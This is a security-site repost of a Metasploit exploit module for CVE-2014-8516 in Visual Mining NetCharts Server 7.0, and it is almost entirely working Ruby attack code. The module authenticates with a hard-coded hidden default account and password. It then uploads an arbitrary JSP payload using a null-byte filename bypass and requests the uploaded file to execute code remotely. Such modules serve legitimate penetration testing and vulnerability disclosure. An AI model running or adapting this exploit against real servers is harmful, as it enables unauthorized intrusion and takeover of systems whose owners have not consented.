首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Visual Mining NetCharts Server Remote Code Execution
来源:metasploit.com 作者:vazquez 发布时间:2014-11-11  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  DEFAULT_USERNAME = 'Scheduler'
  DEFAULT_PASSWORD = '!@#$scheduler$#@!'
  SIGNATURE = 'was uploaded successfully and is now ready for installation'
  
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Visual Mining NetCharts Server Remote Code Execution',
      'Description' => %q{
        This module exploits multiple vulnerabilities in Visual Mining NetCharts.
        First, a lack of input validation in the administration console permits
        arbitrary jsp code upload to locations accessible later through the web
        service. Authentication is typically required, however a 'hidden' user is
        available by default (and non editable). This user, named 'Scheduler',
        can only login to the console after any modification in the user
        database (a user is added, admin password is changed etc). If the
        'Scheduler' user isn't available valid credentials must be supplied. The
        default Admin password is Admin.
      },
      'Author'       =>
        [
          'sghctoma',    # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-8516'],
          ['ZDI', '14-372']
        ],
      'Privileged'  => true,
      'Platform'    => %w{ linux win },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['Visual Mining NetCharts Server 7.0', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 03 2014'))
  
    register_options(
      [
        Opt::RPORT(8001),
        OptString.new('USERNAME', [false, "The username to authenticate with"]),
        OptString.new('PASSWORD', [false, "The password to authenticate with"])
      ], self.class)
  end
  
  def check
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })
  
    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end
  
  def exploit
    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
      register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end
  
    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end
  
  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
      'method' => 'GET',
      'authorization' => basic_auth(username, password)
    }, time_out)
  
    res
  end
  
  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(
      contents,
      'application/octet-stream',
      nil,
      "form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
    )
  
    res = send_request_cgi({
      'uri'    => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
      'method' => 'GET',
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s,
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })
  
    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      true
    else
      false
    end
  end
  
  def username
    datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
  end
  
  def password
    datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·tnftp "savefile" Arbitrary Com
·Internet Explorer 8 MS14-035 U
·ManageEngine Eventlog Analyzer
·IP.Board 3.4.7 SQL Injection
·PicsArt Photo Studio For Andro
·MS Office 2007 and 2010 - OLE
·Belkin n750 jump login Paramet
·Internet Explorer OLE Automati
·Citrix NetScaler SOAP Handler
·Internet Explorer OLE Automati
·i.Mage Local Crash Proof of Co
·MS14-064 Microsoft Windows OLE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved